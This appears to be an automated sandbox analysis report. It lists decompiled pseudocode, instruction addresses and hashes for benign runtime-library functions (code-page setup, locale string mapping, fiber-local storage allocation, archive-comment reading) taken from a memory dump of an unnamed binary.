Instruction ID: bc699040e206596e29170d570a5f01e297756aa44a13a2510714997cd3d78820
Opcode Fuzzy Hash: 7e1d42a28cafaf340a87dc0fc162250c3e64ae29ddfe92e4ca553f0ef2c66b23
Instruction Fuzzy Hash: 1771BF71504F48AADB21DB78CC45AE7B7E8FB94301F44492EE1ABD7142DA326A48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0085A579, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085A579(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x86d668; // 0x14325215
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x85abc4
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x85abc4
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0085B645(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x2ebf88b
					E0085981D(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x2ebf88b
					E0085981D(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0084E243(_v8 ^ _t102);
			}

0x0085a579
0x0085a584
0x0085a58b
0x0085a590
0x0085a59b
0x0085a5ad
0x0085a6a5
0x0085a6a5
0x0085a6ab
0x0085a6ad
0x0085a6ae
0x0085a6ae
0x0085a6b0
0x0085a6b6
0x0085a6b6
0x0085a6b8
0x0085a6ba
0x0085a6c3
0x0085a6c6
0x0085a6d2
0x0085a6d9
0x0085a6e9
0x0085a6db
0x0085a6db
0x0085a6de
0x0085a6de
0x0085a6de
0x0085a6e2
0x0085a6e2
0x00000000
0x0085a6e2
0x0085a6c8
0x0085a6c8
0x0085a6cd
0x0085a6cd
0x0085a6e5
0x0085a6e5
0x0085a6e5
0x0085a6eb
0x0085a6f1
0x0085a6f1
0x0085a6f7
0x0085a6f8
0x0085a6f8
0x0085a5b3
0x0085a5b3
0x0085a5b5
0x0085a5b5
0x0085a5bc
0x0085a5bd
0x0085a5c1
0x0085a5c7
0x0085a5cd
0x0085a5f5
0x0085a5f5
0x0085a5f7
0x00000000
0x00000000
0x0085a5d6
0x0085a5da
0x0085a5ec
0x0085a5ec
0x0085a5ee
0x00000000
0x00000000
0x0085a5df
0x0085a5e1
0x0085a5e3
0x0085a5eb
0x0085a5eb
0x00000000
0x0085a5eb
0x00000000
0x0085a5e1
0x0085a5f0
0x0085a5f0
0x0085a5f3
0x0085a5f3
0x0085a5fa
0x0085a60f
0x0085a615
0x0085a629
0x0085a630
0x0085a63f
0x0085a651
0x0085a658
0x0085a660
0x0085a662
0x0085a662
0x0085a66c
0x0085a67c
0x0085a67e
0x0085a695
0x0085a680
0x0085a680
0x0085a680
0x0085a680
0x0085a685
0x00000000
0x0085a685
0x0085a66e
0x0085a66e
0x0085a673
0x0085a68c
0x0085a68c
0x0085a68c
0x0085a69c
0x0085a69d
0x0085a6a1
0x0085a70c

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0085A59E

Strings

, xrefs: 0085A5E3

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: c60f5a22ead1d0d0cc3d8f8b0636a4b0f8a539d1317d661d2022616f4bb8f79e
Instruction ID: d55ec14f2b68d0e6cfb27b9be4ba17eb78d94a1d1c168ab30dd6ca6ed6ec77e6
Opcode Fuzzy Hash: c60f5a22ead1d0d0cc3d8f8b0636a4b0f8a539d1317d661d2022616f4bb8f79e
Instruction Fuzzy Hash: 2F414AB050424C9EDF258E688CC4BF6BBE9FB55309F1805ECE98AC7142E235DA49DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00831DB1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00831DB1(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				E0084D8C4(E008611EF, __ecx);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00833AAF(__ecx, __edx, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00831715(_t70 - 0x24, __edx, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					E0083188C(_t68, _t64 + 1);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00841006( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00841081( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E008410BC();
					}
					E0083188C(_t68, E00852B93( *_t68));
					_t49 = 1;
				}
				E0083158D(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00831db6
0x00831dbf
0x00831dc3
0x00831dc6
0x00831dc9
0x00831dcc
0x00831dcf
0x00831dd2
0x00831dda
0x00831de0
0x00831de7
0x00831def
0x00831df7
0x00831e02
0x00831e05
0x00831e0f
0x00831e14
0x00831e1e
0x00831e36
0x00831e57
0x00831e38
0x00831e38
0x00831e40
0x00831e49
0x00831e49
0x00831e20
0x00831e20
0x00831e23
0x00831e25
0x00831e28
0x00831e28
0x00831e67
0x00831e6d
0x00831e6f
0x00831e73
0x00831e7e
0x00831e88

APIs

__EH_prolog.LIBCMT ref: 00831DB6

Part of subcall function 00833AAF: __EH_prolog.LIBCMT ref: 00833AB4

Strings

CMT, xrefs: 00831DED

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 23c8319813d4fa350e7c80181c7fd44108ccfec54eaf84ff672bc1913daba075
Instruction ID: dd0719115d593a666cf02dd16e6d0465b15f413fbb624999b0edc86900c9e674
Opcode Fuzzy Hash: 23c8319813d4fa350e7c80181c7fd44108ccfec54eaf84ff672bc1913daba075
Instruction Fuzzy Hash: 352157769002089ECF15EF98D9499EEFBF6FF88700F10006AE845E7252CB325E40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083190B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0083190B(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
				void* __edi;
				void* _t19;
				void* _t23;
				void* _t25;
				signed int _t27;
				void* _t28;
				signed int _t35;
				intOrPtr _t45;
				void* _t52;
				void* _t53;

				_t45 = __edx;
				E0084D8C4(_t19, __ecx);
				if( *((char*)(__ecx + 0x6cb6)) != 0) {
					 *((intOrPtr*)(_t53 - 0x1c)) = __ecx;
					 *((intOrPtr*)(_t53 - 0x14)) =  *((intOrPtr*)( *__ecx + 0x14))();
					 *((intOrPtr*)(_t53 - 0x10)) = __edx;
					_t35 = 0;
					 *((intOrPtr*)(_t53 - 4)) = 0;
					if( *((intOrPtr*)(__ecx + 0x2224)) == 0) {
						_push(__esi);
						_push(0);
						_t23 = E008320B5(__ecx);
						_push(_t45);
						 *((intOrPtr*)( *__ecx + 0x10))();
						_t25 = E00833E61(__ecx, _t45, L"CMT");
						_t52 = _t23;
						if(_t25 != 0) {
							_t28 = E00831DB1(__ecx, _t45, __ecx, _t52,  *((intOrPtr*)(_t53 + 8))); // executed
							if(_t28 != 0) {
								_t35 = 1;
							}
						}
					} else {
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(__ecx + 0x6cc0)) + 0x14);
						 *((intOrPtr*)( *__ecx + 0x10))();
						if(E00833A2C(__ecx,  *__ecx) != 0 &&  *((intOrPtr*)(__ecx + 0x21dc)) == 0x75) {
							_t35 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)) + 4)) > 0x00000000;
						}
					}
					E0083168F(_t53 - 0x1c); // executed
					_t27 = _t35;
				} else {
					_t27 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t27;
			}

0x0083190b
0x0083190b
0x0083191d
0x00831929
0x0083192f
0x00831932
0x00831935
0x00831939
0x00831942
0x00831974
0x00831977
0x00831978
0x0083197d
0x00831981
0x0083198b
0x00831990
0x00831993
0x0083199a
0x008319a1
0x008319a3
0x008319a3
0x008319a1
0x00831944
0x0083194f
0x00831950
0x00831951
0x00831952
0x0083195e
0x0083196f
0x0083196f
0x0083195e
0x008319a8
0x008319ad
0x0083191f
0x0083191f
0x0083191f
0x008319b4
0x008319be

APIs

__EH_prolog.LIBCMT ref: 0083190B

Strings

CMT, xrefs: 00831984

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 378f3733d3dfe682b3022088d1d69d477cca6ff7442ed2cb601ff1a6ad25d8f5
Instruction ID: 93321ab6b81c2212014d88de09f74710bc0a0e518ec6b9847067a583d5f5deb4
Opcode Fuzzy Hash: 378f3733d3dfe682b3022088d1d69d477cca6ff7442ed2cb601ff1a6ad25d8f5
Instruction Fuzzy Hash: 1B11CD70A00205AFDF04EF68C499ABEFBBAFFC5700F44405AE841D7242DB349955CAD2

Uniqueness

Uniqueness Score: -1.00%

Function 00859CBF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00859CBF(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x86d668; // 0x14325215
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E008599EB(0x16, "LCMapStringEx", 0x866084, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00859D47(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x862260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0084E243(_v8 ^ _t33);
			}

0x00859cbf
0x00859cc4
0x00859cc5
0x00859ccc
0x00859ccf
0x00859ce1
0x00859ce6
0x00859ced
0x00859d30
0x00859cef
0x00859d0c
0x00859d12
0x00859d12
0x00859d44

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,47E85006,00000001,?,000000FF), ref: 00859D30

Strings

LCMapStringEx, xrefs: 00859CD0, 00859CDA

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: d84dab3d6efb8c4900ef0d1c127eb7dd8d9b50de0518814bb6eacb1a6e563ec5
Instruction ID: 102b32b40905d309b40513b2c8c8d6f2cfa1adcae7c650bdb07b0d9a8936b930
Opcode Fuzzy Hash: d84dab3d6efb8c4900ef0d1c127eb7dd8d9b50de0518814bb6eacb1a6e563ec5
Instruction Fuzzy Hash: C001133290020DFBCF129F95CC02DAE7FA6FB08751F054158FE18AA260D6768931EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00859C5D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00859C5D(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x86d668; // 0x14325215
				_v8 = _t8 ^ _t22;
				_t10 = E008599EB(0x14, "InitializeCriticalSectionEx", 0x86607c, 0x866084); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x862260(_a4, _a8, _a12);
					 *_t20();
				}
				return E0084E243(_v8 ^ _t22);
			}

0x00859c62
0x00859c63
0x00859c6a
0x00859c7f
0x00859c84
0x00859c8b
0x00859ca8
0x00859c8d
0x00859c98
0x00859c9e
0x00859c9e
0x00859cbc

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008592EC), ref: 00859CA8

Strings

InitializeCriticalSectionEx, xrefs: 00859C78

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 4d462854a169312685a6c037c670da52c8557759fa857eaa18a625b19ca5578e
Instruction ID: 3eb1fdcaf5111ac41b96f47424cc2018c429ac0fddcf83634418b7f2340ba3e6
Opcode Fuzzy Hash: 4d462854a169312685a6c037c670da52c8557759fa857eaa18a625b19ca5578e
Instruction Fuzzy Hash: 79F0B431A4521CFBCB116F55DC01CAE7FA5FB05721B024165FD159A360DAB24E20D7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00859B02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00859B02(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x86d668; // 0x14325215
				_v8 = _t4 ^ _t18;
				_t6 = E008599EB(3, "FlsAlloc", 0x866040, 0x866048); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x862260(_a4);
					 *_t16();
				}
				return E0084E243(_v8 ^ _t18);
			}

0x00859b07
0x00859b08
0x00859b0f
0x00859b24
0x00859b29
0x00859b30
0x00859b41
0x00859b32
0x00859b37
0x00859b3d
0x00859b3d
0x00859b55

APIs

TlsAlloc.KERNEL32 ref: 00859B41

Strings

FlsAlloc, xrefs: 00859B1D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e6ee1b1e2f9da9cc976bf3126fd1520e2b141da14e8899975e7ef62a512a926b
Instruction ID: 1b9b6eefb67dc7276e1f58bfe982fef7378decc36386aff2db5af7708e8ac824
Opcode Fuzzy Hash: e6ee1b1e2f9da9cc976bf3126fd1520e2b141da14e8899975e7ef62a512a926b
Instruction Fuzzy Hash: CFE0E531A45628E7C6206B659C02D6EBB58FF15721B020169FC0AE7380DDB45E1496C7

Uniqueness

Uniqueness Score: -1.00%

Function 00852877, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00852877(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00852756(4, "FlsAlloc", 0x864394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0084E2DE();
				return  *_t6(_a4);
			}

0x0085288c
0x00852891
0x00852898
0x008528ab
0x008528ab
0x0085289f
0x008528a8

APIs

try_get_function.LIBVCRUNTIME ref: 0085288C

Strings

FlsAlloc, xrefs: 0085287B, 00852885

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 601ad3a0d737f7fd95e55f8308b4c31d2cf97e98b524ecd423c843ca7a51b183
Instruction ID: 9dd853aaf9a37d0ba9fe992b5d8e2adea2ab48cca87052abe09f649eb2a949cc
Opcode Fuzzy Hash: 601ad3a0d737f7fd95e55f8308b4c31d2cf97e98b524ecd423c843ca7a51b183
Instruction Fuzzy Hash: B9D0122178572867951032D85D02D9DBA54F602BB2F0610A1FF2CE5381E999541041D6

Uniqueness

Uniqueness Score: -1.00%

Function 0085A8CE, Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0085A8CE(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x86d668; // 0x14325215
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E0085A4A1(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x86d828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x86d828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x890854 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0085A514(_t98);
												goto L37;
											}
										} else {
											E0084E920(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E0085A463( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0085A579(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0084E920(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x86d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x86d820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E0085A463(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x86d82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0085A514(_t98);
				}
				L39:
				return E0084E243(_v8 ^ _t99);
			}

0x0085a8d6
0x0085a8dd
0x0085a8e5
0x0085a8ed
0x0085a8f2
0x0085a903
0x0085a903
0x0085a905
0x0085a907
0x0085a909
0x0085a90c
0x0085a90c
0x0085a912
0x00000000
0x00000000
0x0085a918
0x0085a919
0x0085a91c
0x0085a91f
0x0085a924
0x00000000
0x0085a926
0x0085a926
0x0085a92c
0x0085a9fa
0x0085a932
0x0085a932
0x0085a938
0x00000000
0x0085a93e
0x0085a942
0x0085a948
0x0085a94a
0x00000000
0x0085a950
0x0085a955
